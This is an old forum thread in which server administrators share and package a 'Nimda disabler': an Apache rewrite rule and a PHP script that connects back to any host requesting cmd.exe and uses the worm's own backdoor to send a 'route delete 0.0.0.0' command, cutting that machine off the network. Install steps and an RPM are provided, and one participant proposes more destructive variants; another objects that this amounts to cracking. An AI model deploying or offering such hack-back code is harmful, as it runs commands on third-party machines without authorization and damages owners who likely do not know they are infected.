Topic: Disabling Nimda and Code Red machines..

[Andy MacDonald]

Upon discussions of doing things to infected machines, I was told that scripts have been written for just the purpose.
Being a complete incompetent when it comes to doing things with template files, I'd like to plant the seed of inspiration in whoever is good at this task, in the hope they'll walk me through how to do it.
The link to the script is here
http://everything2.com/index.pl?node_id=1162061&lastnode_id=1160758

[Alex Henriksen]

This is realy cool, it's works fine..!!

[Andy MacDonald]

Great Alex.
Now how do I implement it?
Pretend you're talking to an idiot about the template system, and we'll work fine together....

[Ari]

I'll take a stab at it, Andy...

1. Create the template
# pico -w /etc/e-smith/templates-custom/etc/httpd/conf/httpd.conf/99NimdaDisabler

Copy and paste the following text into the file

# ----------------------------------------------
# Nimda Disabler
# ----------------------------------------------
RewriteEngine on
RewriteRule /cmd\.exe /nimda.php
# ----------------------------------------------


Now you need to rebuild the template...
# /sbin/e-smith/expand-template /etc/httpd/conf/httpd.conf

There ya go.. tough part handled.

The other part should be easy as pie...
Copy the following code into a file called nimda.php in your primary/html directory:

header("HTTP/1.0 400 I've got your number");
if ($HTTP_USER_AGENT == "Antinimda")
 exit; // to prevent loops
$fp =fsockopen($REMOTE_ADDR,80,$a,$a,5);
if ($fp)
{
$req="GET $SCRIPT_URL?/c+route+delete+0.0.0.0 HTTP/1.0
User-Agent: Antinimda\r\n\r\n";
fputs($fp,$req);
$res =fgets($fp,1024);
fclose($fp);
$log=fopen("/tmp/nimda.log","a");
fwrite($log,$REMOTE_ADDR . " " . date("r") . " " .$res."\n" );
fclose($log);
}
if (!$HTTP_USER_AGENT)
  exit;
//otherwise, this is someone with a browser, so lets scare 'em
?>

UR l33t!

I've logged your IP as ,

Your browser as ,

Your IQ as // a number below 50

[Cincron]

That is Great.....

but I have one problem..

in the /etc/e-smith/templates-custom directory, I do not have the required /etc/httpd/conf/httpd.conf/

should I make those Directories?

[Dan Brown]

Yes.

[Ari]

Dan, you think there's any merit in my turning this into an RPM?

Ari

[Cincron]

That worked nicely.... thank you !

Now how do I get to show how many times it was HIT like Mr. Dan Brown has I am jealous of that.... that is a very cool addition I think...


Wish I knew what most of you people know.... Where can I get infomations on all of this stuff... or what Book did you get all this out of ???  Or how do I get to hang around someone who is Linux Smart? hehe..

[Dan Brown]

The hits counter was taken from Darrell May; it isn't mine.  I'm sure it's posted somewhere on his server, but I don't know where.  I just linked the PHP source from my home page, though.

[Ari]

OK... built an RPM (had nothing better to do... )

http://www.marari.net/downloads/nimda_disabler-1.0/ari-mitel-nimda_disabler-1.0-01.noarch.rpm

Source is available as well:
http://www.marari.net/downloads/nimda_disabler-1.0/ari-mitel-nimda_disabler-1.0-01.src.rpm

Download the rpm and issue:
# rpm -Uvh ari-mitel-nimda_disabler-1.0-01.noarch.rpm

And voila! It's done.

Disclaimers:

1 - The nimda.php script is placed in /home/e-smith/files/primary/html
     If you want it elsewhere, cp it from that directory.

2 - I did not write the actual nimda.php script. I just packaged it to make things easier.

3 - Because I did not write the script, you assume COMPLETE responsibility if it does something really nasty or gets you in trouble.

4 - If you have an idea to work in further functionality, go for it!

5 - The rpm and src.rpm are distributed under the GPL.

Cheers!
Ari

[Cincron]

As I look through the coding... I see these lines...

$req="GET $SCRIPT_URL?/c+route+delete+0.0.0.0 HTTP/1.0
User-Agent: Antinimda\r\n\r\n";
fputs($fp,$req);
$res =fgets($fp,1024);
fclose($fp);
$log=fopen("/tmp/nimda.log","a");
fwrite($log,$REMOTE_ADDR . " " . date("r") . " " .$res."\n" );
fclose($log);


I have looked through the PDF file that I got from PHP.net and I don't see any referance to "c+route+delete...."


What exactly does this script do, and does it affect inocent people? I would assume that it only attacks those who attack me, at least I would hope.

[Ari]

> $req="GET $SCRIPT_URL?/c+route+delete+0.0.0.0 HTTP/1.0
> User-Agent: Antinimda\r\n\r\n";
> fputs($fp,$req);
> $res =fgets($fp,1024);
> fclose($fp);
> $log=fopen("/tmp/nimda.log","a");
> fwrite($log,$REMOTE_ADDR . " " . date("r") . " " .$res."\n" );
> fclose($log);
>
> What exactly does this script do, and does it affect inocent
> people? I would assume that it only attacks those who attack
> me, at least I would hope.

As per the original post in this thread...
http://everything2.com/index.pl?node_id=1162061&lastnode_id=1160758

It clearly states the following:
"This attempts to connect to any server that requests the file "cmd.exe" in any directory, using the same path that it used and tries to delete the routing tables. This effectively drops it from the internet, stopping any further attacks. It logs the output to /tmp/nimda.log, and additionally warns any human trying the exploit with a browser"

Ari

[Andy MacDonald]

Thank you all concerned.
My evil work here is done.... Thanks Ari
My e-smith box is now a force for good.

The apache hits counter is available from
http://www.myezserver.com/downloads/mitel/contrib/apache-hits/

Basically, you just unzip it and put it in you primary/html directory

It will now be more than just a source of amusement...

[Des Dougan]

With all due respect to those taking part in this thread, given that it is very likely that those infected with Code Red or Nimda have no idea they have it (otherwise they would apply the patches, right?), attacking them by dropping their routing tables or hitting their browser seems mean-spirited and could be construed as attempted cracking - in other words someone who does this becomes one of the bad guys in the eyes of others.

It seems to me that it would be much more constructive to do a whois search on the IP address's owner and send an email to postmaster@ (likely to be the ISP, I'd imagine) informing them that this activity is continuing to happen and requesting that they follow up with the person/company to whom they've allocated that IP address.

I know that ISPs are notoriously lazy at following up things like email domain spoofing, so perhaps publishing the weekly Top 10 of ISPs allowing Nimda/Code Red to be perpetuated in InfoWorld or E-week or some other mainstream technology paper might make them sit up and take some action.

Des Dougan

[Andy MacDonald]

Hi Des,
While I appreciate what you are trying to suggest, I would put it to you that I have tried this. I get about 450-500 hits a week. Most of the traffic I get comes from China, Vietnam or other developing countries. Even if the ISP's or owners of these machines could read what I send, I am in NO doubt that they DON'T CARE even if they DO know what their machines are doing.
I do like to have a life rather than send 500 emails a week.
The only way they will start worrying about it is if they're sick of their machines not functioning after a while. Then the problem directly affects them. The limited cure we have affects the same vulnerability that allows the worm to propagate.
The patches are out there. They are free.
Asking people who don't care just DOES NOT WORK.
I would like to make them care.
I would also like to make a .rpm that somehow encourages people to randomly bitch slap system admins who put unpatched vulnerable machines onto the net.
I've got the template system to a point where I can understand it now. The .rpm stuff needs some work, but the random people bitch slap executable is beyond my skills to incite, unless I could post the guilty sysadmins address to a willing bunch of vigilantes.
The cmd.exe presents a limited set of options to the person exploiting the vulnerability. It would not be hard to modify that script to take advantage of a few more distructive variations.
We will have differences of opinions, but what has been done is quite within the bounds of reasonable behavior as far as I'm concerned. People agreeing with me can install the .rpm. People that rely on other people doing the right thing can wait for the problem to hopefully disappear one day without installing the rpm.
Ari. You are a legend. Thanks very much.

[Ari Novikoff]

Andy MacDonald wrote:
> I do like to have a life rather than send 500 emails a week.

I can relate Andy, but in all honesty I've not installed the script myself. All I did was create the RPM.

> I would also like to make a .rpm that somehow encourages
> people to randomly bitch slap system admins who put unpatched
> vulnerable machines onto the net.

LOL! What a concept!

> The cmd.exe presents a limited set of options to the person
> exploiting the vulnerability. It would not be hard to modify
> that script to take advantage of a few more distructive
> variations.

And we all know that self-propogating polymorphic viruses are just around the corner (if they're not already out there...)

> Ari. You are a legend. Thanks very much.

Wow... All I did was package up someone else's script... really, it was nothing... but thanks anyway


Ari

[sidney]

Is there away to see if the script is working?
some kind of log?

can the rpm be uninstalled? & how?



Thanks
P.S I agree with Andy

Thanks Ari for putting the rpm together

[Ari]

I haven't done an uninstall segment to the RPM, but you can always remove the script manually.

There's a couple of small changes that I'll have to make to the script to make sure that it works properly, but I'm kinda tied up right now with other stuff (the Snort/Acid/Guardian project for one...) so I'll get to it when I get some time. Maybe later this weekend.

As for using the rpm right now, yes, you could... But there's a couple of extra steps you'll need to take... check out the link at the start of this thread and you'll see what I'm talking about.

The next release of the rpm should incorporate all of that.

Ari

[Time]

What happened to the RPM.....I went to:

http://www.marari.net/downloads/nimda_disabler-1.0/ari-mitel-nimda_disabler-1.0-01.noarch.rpm

Would really like to find it...can anyone help?

Thanks!

[guestHH]

Hi Time,

For the time being you can always install it manually. Get more info from the original post by Andy.

Regards,
guestHH

[Time]

I did just that Hsing.

Thanks

[Dan G.]

Is anyone who is using this getting entries in their /tmp/nimda.log?  I have had it running for weeks, and not gotten a single entry.  Apache-hits.php shows about 600 hits in that same time period...

Dan